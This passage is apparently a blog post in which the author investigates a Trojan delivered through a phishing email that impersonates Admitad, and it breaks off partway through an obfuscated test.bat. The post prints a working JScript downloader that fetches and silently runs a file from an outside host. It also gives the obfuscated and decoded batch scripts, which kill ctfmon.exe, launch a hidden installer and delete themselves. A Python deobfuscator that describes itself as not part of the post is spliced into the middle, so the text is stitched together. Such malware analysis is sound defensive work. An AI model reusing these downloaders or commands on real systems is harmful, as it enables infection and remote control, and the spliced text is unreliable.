
Modern Trojan Horse: the story of a single investigation


Hello!

Today I will tell you about a Trojan horse that wandered into the garden of my very good friend, how I drove the intruder out, what was inside it, and what lessons I learned from all this.

If you're interested, welcome under the cut!

Part One: The Beginning


It all started about three weeks ago, on a warm spring day, when my very good friend called me and told me the following story: a few minutes earlier he had received an email from Admitad, a company he had a business relationship with. The letter (only fragments of its text survive here) read:
 Admitad ... 23.03.16 ... 25.03.16 ... AD ... Admitad Support.

The sender was Admitad Support. And, of course, a RAR archive with an XLS file inside was attached to the letter.

He unpacked the archive, of course, launched the XLS file and (ta-daaaa!) allowed macros to run, because instead of the expected table Excel displayed a lengthy explanation about some macros (the devil knows what it was; some nonsense, in a word). Well, when he then saw some invoice for payment for watching a video, it finally dawned on him that he had been cruelly deceived. He realized that he had just caught some kind of infection and asked me to take a look at the computer and get rid of it.

I listened to the story, scolded him a little, sympathized with him and asked him to start TeamViewer, because I was a bit too lazy to drive across the whole city.

Part Two: Initial Examination


Having connected to the computer via TeamViewer, I began the examination.

First of all, the attachment was sent to Virustotal: the result was 0/56. Fresh stuff, I thought.
Then I began to look for recently created files on the disk. I found them in the temp folder: among other things, there were two executable files: run.exe and stream.js.

Here is what stream.js looked like inside:
 (function (Global) {
     function CreateObject(ProgId) { return new ActiveXObject(ProgId); }
     var FSO = fso = CreateObject("Scripting.FileSystemObject");
     var WshShell = CreateObject("WScript.Shell");
     function tmp() { var uyeifds = new ActiveXObject("Shell.Application"); return uyeifds; }
     function isFile(Path) { Path = WshShell.ExpandEnvironmentStrings(Path); return fso.FileExists(Path); }
     // "0" = run with a hidden window
     function shl(rto) { tmp().ShellExecute(rto, "", "", "open", "0"); }
     function DeleteFile(Path) {
         if (/Array/i.test(Path.constructor + "")) { for (var i = 0, l = Path.length; i < l; i++) DeleteFile(Path[i]); return; }
         Path = WshShell.ExpandEnvironmentStrings(Path);
         try { if (isFile(Path)) FSO.GetFile(Path).Delete(true); } catch (e) {}
     }
     function DownloadFileFromURL(Url, FileDest) {
         // ProgIDs and the HTTP verb are assembled from fragments to dodge simple string signatures
         var msx = "Msxml2";
         if (!FileDest || !Url) return null;
         var ge = "GE";
         FileDest = WshShell.ExpandEnvironmentStrings(FileDest);
         msx = msx + ".XMLHTTP";
         DeleteFile(FileDest);
         var oXMLHTTP = WScript.CreateObject(msx);
         oXMLHTTP.open(ge + "T", Url, false);
         oXMLHTTP.send(null);
         var oADOStream = CreateObject("ADO" + "DB.Stream");
         with (oADOStream) {
             Mode = 3; Type = 1; Open();
             Write(oXMLHTTP.responseBody);
             SaveToFile(FileDest, 2);
             Close();
             return FileDest;
         }
     }
     var tor1 = "%TMP%\\run.e";
     var tor2 = "xe";
     try {
         // probe of a path that normally does not exist: the download runs only in the catch branch
         FSO.GetFile("\\\\WORKOUT\\..hj");
     } catch (e) {
         var Url = "http://s2.zalivalka.ru/download/344314/231.jpg";
         DownloadFileFromURL(Url, tor1 + tor2);   // saved as %TMP%\run.exe
         shl(WshShell.ExpandEnvironmentStrings(tor1 + tor2));
     }
 })(this)


A quick inspection of the patient made it clear that this is just a downloader: it fetches the file https: //s2.zalivalka.ru/download/344314/231.jpg, saves it as run.exe and runs it. In the URL I have deliberately replaced the Latin 'p' in 'http' with the Cyrillic 'р', so that the URL does not turn into a link. Virustotal was just as modestly silent about run.exe.

Okay, I thought, and continued searching the computer for recently created files. Soon the folder "%appdata%\MicrocoftUpdate\" was discovered, with a bunch of files inside. Yes, yes, exactly that: Micro-c-oft, with a 'c'. I don't know whether this mistake was made deliberately or not, but it greatly simplified the subsequent search for changes made to the registry. There was only one exe in this folder: ctfmon.exe. In case anyone has forgotten, I remind you that this was once the name of the keyboard layout switcher in Windows XP.

To begin with, I decided to rename this folder, so that the virus I had not yet found could not use the files in it. However, the attempt to rename the folder failed. Isn't it ctfmon.exe, started from this very folder, that is preventing me from doing this? I thought. I opened the task manager, and sure enough, there it was, my dear. I terminated it, and after that the folder was renamed.

Then I sent ctfmon.exe to Virustotal. The result was not very scary, something around 5/56, and those five said it was not a virus but so-called RiskWare: legitimate software used for remote computer control. Then I returned to the temp folder, and at that moment I realized that I had made a serious mistake: the folder was empty. In parallel with me, someone had been rummaging through the computer, gathered everything he needed, tidied up carefully after himself and left.

Damn, damn, damn! My laziness gave the enemy the opportunity to do his dirty deed. I dialed my friend's number, asked him to turn off the computer, took the laptop and went to his place.

Part Three: Preparing the Horse


For the vivisection, a virtual machine was set up on the laptop with Windows 7, Microsoft Office, Process Monitor and Wireshark installed. Having started the virus, I waited a bit for it to finish all its business and launch ctfmon.exe, after which I terminated ctfmon and began to study the collected logs.

From the Process Monitor log it soon became clear that run.exe is a self-extracting archive. To verify, I opened it as an archive: sure enough, there are two files inside: t10.bat and poi.exe. Having pulled t10.bat out of the archive, I decided to study it, but no such luck! I had never seen anything like this before.

Inside t10.bat was this:
 set iDVrlM=set %iDVrlM% pGJV= %iDVrlM%%pGJV%lVOMlhijX== %iDVrlM%%pGJV%GcayqJj%lVOMlhijX%{ %iDVrlM%%pGJV%DysQd%lVOMlhijX%i %iDVrlM%%pGJV%zSdh%lVOMlhijX%0 %iDVrlM%%pGJV%IyEwFH%lVOMlhijX%W %iDVrlM%%pGJV%wgHafh%lVOMlhijX%d %iDVrlM%%pGJV%EyadtMp%lVOMlhijX%f %iDVrlM%%pGJV%ipCNKA%lVOMlhijX%5 %iDVrlM%%pGJV%QYFaxm%lVOMlhijX%* %iDVrlM%%pGJV%VTlcnvcrw%lVOMlhijX%] %iDVrlM%%pGJV%rirX%lVOMlhijX%M %iDVrlM%%pGJV%iKwg%lVOMlhijX%_ %iDVrlM%%pGJV%RASAyUS%lVOMlhijX%? %iDVrlM%%pGJV%heoAiQ%lVOMlhijX%g %iDVrlM%%pGJV%uMCoFRy%lVOMlhijX%/ %iDVrlM%%pGJV%hxUEB%lVOMlhijX%$ %iDVrlM%%pGJV%JzIoznwCO%lVOMlhijX%v %iDVrlM%%pGJV%dbqUTP%lVOMlhijX%! %iDVrlM%%pGJV%KepbD%lVOMlhijX%# %iDVrlM%%pGJV%LXEX%lVOMlhijX%s %iDVrlM%%pGJV%LpfBjM%lVOMlhijX%@ %iDVrlM%%pGJV%UahIVhihw%lVOMlhijX%I %iDVrlM%%pGJV%uCYMaI%lVOMlhijX%- %iDVrlM%%pGJV%vmit%lVOMlhijX%D %iDVrlM%%pGJV%MCWbFLDjD%lVOMlhijX%E %iDVrlM%%pGJV%knPXvDj%lVOMlhijX%7 %iDVrlM%%pGJV%YEhMVMG%lVOMlhijX%; %iDVrlM%%pGJV%wTULRTl%lVOMlhijX%1 %iDVrlM%%pGJV%Jrjse%lVOMlhijX%q %iDVrlM%%pGJV%NDAI%lVOMlhijX%x %iDVrlM%%pGJV%lUEuKBc%lVOMlhijX%U %iDVrlM%%pGJV%HriWu%lVOMlhijX%8 %iDVrlM%%pGJV%VMaInwUi%lVOMlhijX%w %iDVrlM%%pGJV%KrGSTTdN%lVOMlhijX%9 %iDVrlM%%pGJV%XokcwjROA%lVOMlhijX%\ %iDVrlM%%pGJV%DdlJvxpBT%lVOMlhijX%y %iDVrlM%%pGJV%LVicuKuUF%lVOMlhijX%F %iDVrlM%%pGJV%hnydIrGM%lVOMlhijX%B %iDVrlM%%pGJV%RXvHWsxrp%lVOMlhijX%4 %iDVrlM%%pGJV%dIYiPoN%lVOMlhijX%} %iDVrlM%%pGJV%ukXME%lVOMlhijX%+ %iDVrlM%%pGJV%gWSgSMYA%lVOMlhijX%T %iDVrlM%%pGJV%IYBhtEnG%lVOMlhijX%e %iDVrlM%%pGJV%yBLVgYi%lVOMlhijX%N %iDVrlM%%pGJV%YYRSUQ%lVOMlhijX%z %iDVrlM%%pGJV%UbHph%lVOMlhijX%P %iDVrlM%%pGJV%fTsricQFz%lVOMlhijX%k %iDVrlM%%pGJV%gkNnIB%lVOMlhijX%2 %iDVrlM%%pGJV%ztzbgDRjB%lVOMlhijX%j %iDVrlM%%pGJV%TMmw%lVOMlhijX%n %iDVrlM%%pGJV%bFpwLXPA%lVOMlhijX%p %iDVrlM%%pGJV%UjcGDFmD%lVOMlhijX%a %iDVrlM%%pGJV%ydOvR%lVOMlhijX%Y %iDVrlM%%pGJV%cpwfdcVIC%lVOMlhijX%" %iDVrlM%%pGJV%sIMODTo%lVOMlhijX%) %iDVrlM%%pGJV%reSQtdOC%lVOMlhijX%[ %iDVrlM%%pGJV%LnzWsIe%lVOMlhijX%6 %iDVrlM%%pGJV%gJBfV%lVOMlhijX%L 
%iDVrlM%%pGJV%XmuWmdma%lVOMlhijX%. %iDVrlM%%pGJV%sAGBcVq%lVOMlhijX%h %iDVrlM%%pGJV%GmXLXKBWD%lVOMlhijX%O %iDVrlM%%pGJV%CwxeyCrE%lVOMlhijX%t %iDVrlM%%pGJV%mmTzf%lVOMlhijX%l %iDVrlM%%pGJV%aTVdF%lVOMlhijX%r %iDVrlM%%pGJV%ILOSfqlmf%lVOMlhijX%Z %iDVrlM%%pGJV%WsGmIpaah%lVOMlhijX%R %iDVrlM%%pGJV%yJgKHTGjV%lVOMlhijX%C %iDVrlM%%pGJV%TPqwMwH%lVOMlhijX%Q %iDVrlM%%pGJV%hJJAtBUgr%lVOMlhijX%H %iDVrlM%%pGJV%hHpkv%lVOMlhijX%m %iDVrlM%%pGJV%wlLk%lVOMlhijX%b %iDVrlM%%pGJV%hlbFW%lVOMlhijX%, %iDVrlM%%pGJV%cGSDDWyd%lVOMlhijX%X %iDVrlM%%pGJV%phqNn%lVOMlhijX%J %iDVrlM%%pGJV%fPbur%lVOMlhijX%S %iDVrlM%%pGJV%eOigMGv%lVOMlhijX%u %iDVrlM%%pGJV%CbAKNK%lVOMlhijX%K %iDVrlM%%pGJV%IWaff%lVOMlhijX%3 %iDVrlM%%pGJV%sccH%lVOMlhijX%c %iDVrlM%%pGJV%PoATNXt%lVOMlhijX%o %iDVrlM%%pGJV%tdMSJfDrF%lVOMlhijX%V %iDVrlM%%pGJV%ITymyoQK%lVOMlhijX%: %iDVrlM%%pGJV%eaOFc%lVOMlhijX%G %iDVrlM%%pGJV%Bucwql%lVOMlhijX%A %iDVrlM%%pGJV%lcDFKx%lVOMlhijX%( %LpfBjM%%MCWbFLDjD%%sccH%%sAGBcVq%%PoATNXt%%pGJV%%GmXLXKBWD%%EyadtMp%%EyadtMp% %bFpwLXPA%%DysQd%%TMmw%%heoAiQ%%pGJV%%uCYMaI%%TMmw%%pGJV%%gkNnIB%%pGJV%%heoAiQ%%PoATNXt%%PoATNXt%%heoAiQ%%mmTzf%%IYBhtEnG%%XmuWmdma%%sccH%%PoATNXt%%hHpkv%|%LVicuKuUF%%DysQd%%TMmw%%wgHafh%%pGJV%%uMCoFRy%%UahIVhihw%%pGJV%%cpwfdcVIC%%gWSgSMYA%%gWSgSMYA%%gJBfV%%lVOMlhijX%%cpwfdcVIC%||%heoAiQ%%PoATNXt%%CwxeyCrE%%PoATNXt%%pGJV%%TMmw%%IYBhtEnG%%NDAI%%CwxeyCrE%%pGJV% %CwxeyCrE%%UjcGDFmD%%LXEX%%fTsricQFz%%fTsricQFz%%DysQd%%mmTzf%%mmTzf%%pGJV%%uMCoFRy%%EyadtMp%%pGJV%%uMCoFRy%%DysQd%%hHpkv%%pGJV%%sccH%%CwxeyCrE%%EyadtMp%%hHpkv%%PoATNXt%%TMmw%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %CwxeyCrE%%UjcGDFmD%%LXEX%%fTsricQFz%%fTsricQFz%%DysQd%%mmTzf%%mmTzf%%pGJV%%uMCoFRy%%EyadtMp%%pGJV%%uMCoFRy%%DysQd%%hHpkv%%pGJV%%sccH%%CwxeyCrE%%EyadtMp%%hHpkv%%PoATNXt%%TMmw%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %CwxeyCrE%%UjcGDFmD%%LXEX%%fTsricQFz%%fTsricQFz%%DysQd%%mmTzf%%mmTzf%%pGJV%%uMCoFRy%%EyadtMp%%pGJV%%uMCoFRy%%DysQd%%hHpkv%%pGJV%%sccH%%CwxeyCrE%%EyadtMp%%hHpkv%%PoATNXt%%TMmw%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% 
%CwxeyCrE%%UjcGDFmD%%LXEX%%fTsricQFz%%fTsricQFz%%DysQd%%mmTzf%%mmTzf%%pGJV%%uMCoFRy%%EyadtMp%%pGJV%%uMCoFRy%%DysQd%%hHpkv%%pGJV%%sccH%%CwxeyCrE%%EyadtMp%%hHpkv%%PoATNXt%%TMmw%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %CwxeyCrE%%UjcGDFmD%%LXEX%%fTsricQFz%%fTsricQFz%%DysQd%%mmTzf%%mmTzf%%pGJV%%uMCoFRy%%EyadtMp%%pGJV%%uMCoFRy%%DysQd%%hHpkv%%pGJV%%sccH%%CwxeyCrE%%EyadtMp%%hHpkv%%PoATNXt%%TMmw%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %CwxeyCrE%%UjcGDFmD%%LXEX%%fTsricQFz%%fTsricQFz%%DysQd%%mmTzf%%mmTzf%%pGJV%%uMCoFRy%%EyadtMp%%pGJV%%uMCoFRy%%DysQd%%hHpkv%%pGJV%%sccH%%CwxeyCrE%%EyadtMp%%hHpkv%%PoATNXt%%TMmw%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %CwxeyCrE%%UjcGDFmD%%LXEX%%fTsricQFz%%fTsricQFz%%DysQd%%mmTzf%%mmTzf%%pGJV%%uMCoFRy%%EyadtMp%%pGJV%%uMCoFRy%%DysQd%%hHpkv%%pGJV%%sccH%%CwxeyCrE%%EyadtMp%%hHpkv%%PoATNXt%%TMmw%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG%%pGJV%%uMCoFRy%%JzIoznwCO%%IYBhtEnG%%aTVdF%%DdlJvxpBT%%LXEX%%DysQd%%mmTzf%%IYBhtEnG%%TMmw%%CwxeyCrE%%pGJV%%uMCoFRy%%UbHph%%UjcGDFmD%%LXEX%%LXEX%%VMaInwUi%%PoATNXt%%aTVdF%%wgHafh%%lVOMlhijX%%IWaff%%RXvHWsxrp%%ipCNKA%%RXvHWsxrp%%LnzWsIe%%ipCNKA%%wTULRTl%%gkNnIB%%gkNnIB%%IWaff%%RXvHWsxrp%%ipCNKA% %bFpwLXPA%%DysQd%%TMmw%%heoAiQ%%pGJV%%mmTzf%%PoATNXt%%sccH%%UjcGDFmD%%mmTzf%%sAGBcVq%%PoATNXt%%LXEX%%CwxeyCrE%%pGJV%%uCYMaI%%wTULRTl%%zSdh% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%0%pGJV%>%pGJV%%TMmw%%eOigMGv%%mmTzf% %heoAiQ%%PoATNXt%%CwxeyCrE%%PoATNXt%%pGJV%%wTULRTl% :next %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% 
%wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%0%pGJV%>%pGJV%%TMmw%%eOigMGv%%mmTzf% :1 %MCWbFLDjD%%NDAI%%DysQd%%CwxeyCrE%%pGJV% 


It looked like some kind of cipher from Alex to Eustace. I had to figure it out.

The first line read:
 set iDVrlM=set 

It is clear that all occurrences of '%iDVrlM%' in the text need to be replaced with 'set'. No sooner said than done:
 set iDVrlM=set
 set pGJV= 
 set%pGJV%lVOMlhijX==
 set%pGJV%GcayqJj%lVOMlhijX%{
 ...

Now the second line looks human. After the equals sign there is a space (it is not visible in the listing). It is clear that now all occurrences of '%pGJV%' need to be replaced with a space:
 set iDVrlM=set
 set pGJV= 
 set lVOMlhijX==
 set GcayqJj%lVOMlhijX%{
 set DysQd%lVOMlhijX%i
 ...

Go ahead. The third line tells us that all occurrences of '%lVOMlhijX%' need to be replaced with an equals sign. The result of the replacement:
 set iDVrlM=set set pGJV= set lVOMlhijX== set GcayqJj={ set DysQd=i set zSdh=0 set IyEwFH=W set wgHafh=d set EyadtMp=f set ipCNKA=5 set QYFaxm=* set VTlcnvcrw=] set rirX=M set iKwg=_ set RASAyUS=? set heoAiQ=g set uMCoFRy=/ set hxUEB=$ set JzIoznwCO=v set dbqUTP=! set KepbD=# set LXEX=s set LpfBjM=@ set UahIVhihw=I set uCYMaI=- set vmit=D set MCWbFLDjD=E set knPXvDj=7 set YEhMVMG=; set wTULRTl=1 set Jrjse=q set NDAI=x set lUEuKBc=U set HriWu=8 set VMaInwUi=w set KrGSTTdN=9 set XokcwjROA=\ set DdlJvxpBT=y set LVicuKuUF=F set hnydIrGM=B set RXvHWsxrp=4 set dIYiPoN=} set ukXME=+ set gWSgSMYA=T set IYBhtEnG=e set yBLVgYi=N set YYRSUQ=z set UbHph=P set fTsricQFz=k set gkNnIB=2 set ztzbgDRjB=j set TMmw=n set bFpwLXPA=p set UjcGDFmD=a set ydOvR=Y set cpwfdcVIC=" set sIMODTo=) set reSQtdOC=[ set LnzWsIe=6 set gJBfV=L set XmuWmdma=. set sAGBcVq=h set GmXLXKBWD=O set CwxeyCrE=t set mmTzf=l set aTVdF=r set ILOSfqlmf=Z set WsGmIpaah=R set yJgKHTGjV=C set TPqwMwH=Q set hJJAtBUgr=H set hHpkv=m set wlLk=b set hlbFW=, set cGSDDWyd=X set phqNn=J set fPbur=S set eOigMGv=u set CbAKNK=K set IWaff=3 set sccH=c set PoATNXt=o set tdMSJfDrF=V set ITymyoQK=: set eaOFc=G set Bucwql=A set lcDFKx=( ... 


Well, now the whole replacement alphabet has been revealed. Having spent 15 more minutes with text and HEX editors, I replaced all the %...% strings with the corresponding characters and ended up with this bat-file:
 @Echo Off
 ping -n 2 google.com|Find /I "TTL="||goto next
 taskkill /f /im ctfmon.exe
 taskkill /f /im ctfmon.exe
 taskkill /f /im ctfmon.exe
 taskkill /f /im ctfmon.exe
 taskkill /f /im ctfmon.exe
 taskkill /f /im ctfmon.exe
 taskkill /f /im ctfmon.exe
 poi.exe /verysilent /Password=345465122345
 ping localhost -10
 del %0 > nul
 goto 1
 :next
 del poi.exe
 del poi.exe
 del poi.exe
 del poi.exe
 del poi.exe
 del poi.exe
 del poi.exe
 del poi.exe
 del poi.exe
 del poi.exe
 del poi.exe
 del poi.exe
 del poi.exe
 del poi.exe
 del poi.exe
 del poi.exe
 del poi.exe
 del poi.exe
 del poi.exe
 del poi.exe
 del poi.exe
 del poi.exe
 del poi.exe
 del poi.exe
 del %0 > nul
 :1
 Exit

The essence of the bat-file turned out to be very straightforward: by pinging google.com it checks for an Internet connection. If there is no connection, poi.exe is deleted along with the bat-file itself, and that is the end of it. If there is a connection, the ctfmon.exe process is first terminated, then poi.exe is launched with the parameters "/verysilent" and "/Password=345465122345", and then the bat-file self-destructs.
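The substitution done above by hand (replace the variable that spells "set", then the one that spells a space, then the one that spells "=", then the whole alphabet) is mechanical enough to automate. The script below is an added example, not code from this post and not the C# program mentioned later on: it processes `set name=value` lines in order, the way cmd.exe does, expands the `%name%` references already known on every following line, and leaves unknown references such as `%0`, `%~dp0` or `%appData%` untouched so that the decoded commands stay readable. The sample input is constructed from a handful of the alphabet entries in the listing above and decodes to the first line of t10.bat and its "del %0 > nul" line; `decode_file` and its cp866 default are assumptions for reading a sample from disk.

```python
import re

# A %name% reference. Names start with a letter or underscore, so argument
# references such as %0 or %~dp0 are never treated as variables.
VAR_RE = re.compile(r"%([A-Za-z_][A-Za-z0-9_]*)%")
# cmd.exe assignment:  set NAME=VALUE   (the value runs to the end of the
# line, trailing spaces included, which is how 'set pGJV= ' stores a space)
SET_RE = re.compile(r"^\s*set\s+([^=]+)=(.*)$", re.IGNORECASE)


def expand(line, env):
    """Replace every %name% that is already defined; leave the rest verbatim
    (for example %appData%, which belongs to the host, not to the script)."""
    return VAR_RE.sub(lambda m: env.get(m.group(1).lower(), m.group(0)), line)


def deobfuscate(lines):
    """Walk the script top to bottom the way cmd.exe would: expand each line
    with the variables known so far, record new assignments, and collect every
    other non-empty line as a decoded command.
    Returns (commands, env); env maps lowercase variable names to values."""
    env = {}
    commands = []
    for raw in lines:
        line = expand(raw.rstrip("\r\n"), env)
        m = SET_RE.match(line)
        if m:
            env[m.group(1).lower()] = m.group(2)   # value may be a lone space
        elif line.strip():
            commands.append(line)
    return commands, env


# Constructed sample in the t10.bat style: the first line defines 'set'
# itself, the next two a space and an '=', then one variable per character,
# and finally two commands spelled out of those variables. The variable names
# and the characters they stand for are the ones from the listing above.
SAMPLE = [
    "set iDVrlM=set",
    "%iDVrlM% pGJV= ",                      # -> set pGJV=<space>
    "%iDVrlM%%pGJV%lVOMlhijX==",            # -> set lVOMlhijX==
    "%iDVrlM%%pGJV%LpfBjM%lVOMlhijX%@",     # -> set LpfBjM=@
    "%iDVrlM%%pGJV%MCWbFLDjD%lVOMlhijX%E",
    "%iDVrlM%%pGJV%sccH%lVOMlhijX%c",
    "%iDVrlM%%pGJV%sAGBcVq%lVOMlhijX%h",
    "%iDVrlM%%pGJV%PoATNXt%lVOMlhijX%o",
    "%iDVrlM%%pGJV%GmXLXKBWD%lVOMlhijX%O",
    "%iDVrlM%%pGJV%EyadtMp%lVOMlhijX%f",
    "%iDVrlM%%pGJV%wgHafh%lVOMlhijX%d",
    "%iDVrlM%%pGJV%IYBhtEnG%lVOMlhijX%e",
    "%iDVrlM%%pGJV%mmTzf%lVOMlhijX%l",
    "%iDVrlM%%pGJV%TMmw%lVOMlhijX%n",
    "%iDVrlM%%pGJV%eOigMGv%lVOMlhijX%u",
    # @Echo Off
    "%LpfBjM%%MCWbFLDjD%%sccH%%sAGBcVq%%PoATNXt%%pGJV%%GmXLXKBWD%%EyadtMp%%EyadtMp%",
    # del %0 > nul   (note the %0 argument reference in the middle)
    "%wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%0%pGJV%>%pGJV%%TMmw%%eOigMGv%%mmTzf%",
]


def decode_file(path, encoding="cp866"):
    """Decode an obfuscated .bat from disk. The OEM code page default is an
    assumption; pass whatever encoding the sample was saved in."""
    with open(path, encoding=encoding, errors="replace") as fh:
        return deobfuscate(fh.readlines())


if __name__ == "__main__":
    cmds, env = deobfuscate(SAMPLE)
    print("\n".join(cmds))
```

Because each line is expanded with only the variables defined before it, the script handles the self-referential trick of the first lines (the word `set` itself being a variable) without special cases; the same loop decodes test.bat, which uses the same construction with a different alphabet.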

Two points remained unclear to me: what the "ping localhost -10" command was supposed to do, and why the taskkill and del operations are repeated so many times.

Anyway. After that I began to study poi.exe. An attempt to open it as an archive failed. However, launching a program with parameters is somewhat unusual behaviour for a virus (or so it seemed to me). Therefore I turned to the well of knowledge called the Internet and immediately found what I was looking for using the keywords "verysilent" and "Password": Inno Setup, a free installer for Windows programs.

If someone made the packer, someone else must have made the unpacker, I thought, and continued searching. The query "inno setup decompiler" immediately gave the desired result. Great! I downloaded it and ran it:
 d:\virus\poi>innounp -x -p345465122345 poi.exe
 ; Version detected: 5500 (Unicode)
 #0 {app}\avicap32.dll
 Reading slice d:\virus\poi\poi.exe
 #1 {app}\ctfmon.exe
 #2 {app}\test.bat
 #3 {app}\test.vbs
 #4 install_script.iss

The unpacker quickly finished its work and I received several files for further study. I started with install_script.iss. The only noteworthy section was [Run]:
 Filename: "{app}\test.vbs"; Description: "{cm:LaunchProgram,Test}"; MinVersion: 0.0,5.0; Flags: shellexec postinstall nowait

From it, it became clear that the VB script test.vbs is launched first:
 On Error Resume Next
 Set WshShell = CreateObject("WScript.Shell")
 WshShell.Run "test.bat",0,true
 Set FSO = CreateObject("Scripting.FileSystemObject")
 FSO.DeleteFile WScript.ScriptFullName, 0

This script is also simple: it runs test.bat (with a hidden window) and self-destructs.

Now let's look at test.bat:

Ugh, damn it, now it's Eustace cabling Alex!
 set lpQmnLQ=set %lpQmnLQ% RCRUDqE= %lpQmnLQ%%RCRUDqE%yFcQKpJyG== %lpQmnLQ%%RCRUDqE%aaLTgkA%yFcQKpJyG%# %lpQmnLQ%%RCRUDqE%kOXeOOyR%yFcQKpJyG%@ %lpQmnLQ%%RCRUDqE%toTUt%yFcQKpJyG%o %lpQmnLQ%%RCRUDqE%mRMLJkAp%yFcQKpJyG%/ %lpQmnLQ%%RCRUDqE%IHrQ%yFcQKpJyG%; %lpQmnLQ%%RCRUDqE%immQQhH%yFcQKpJyG%c %lpQmnLQ%%RCRUDqE%ksBw%yFcQKpJyG%Q %lpQmnLQ%%RCRUDqE%qlLeeJ%yFcQKpJyG%f %lpQmnLQ%%RCRUDqE%QvBGN%yFcQKpJyG%E %lpQmnLQ%%RCRUDqE%SAKEFniaY%yFcQKpJyG%G %lpQmnLQ%%RCRUDqE%hmixayLOL%yFcQKpJyG%M %lpQmnLQ%%RCRUDqE%oaLFfs%yFcQKpJyG%} %lpQmnLQ%%RCRUDqE%NjHP%yFcQKpJyG%K %lpQmnLQ%%RCRUDqE%MuOksUDd%yFcQKpJyG%u %lpQmnLQ%%RCRUDqE%upeuMhJ%yFcQKpJyG%H %lpQmnLQ%%RCRUDqE%mOMhgb%yFcQKpJyG%y %lpQmnLQ%%RCRUDqE%NSQCAVz%yFcQKpJyG%: %lpQmnLQ%%RCRUDqE%dxmCkR%yFcQKpJyG%[ %lpQmnLQ%%RCRUDqE%ScSLQo%yFcQKpJyG%l %lpQmnLQ%%RCRUDqE%iGpKA%yFcQKpJyG%0 %lpQmnLQ%%RCRUDqE%MKbjyO%yFcQKpJyG%R 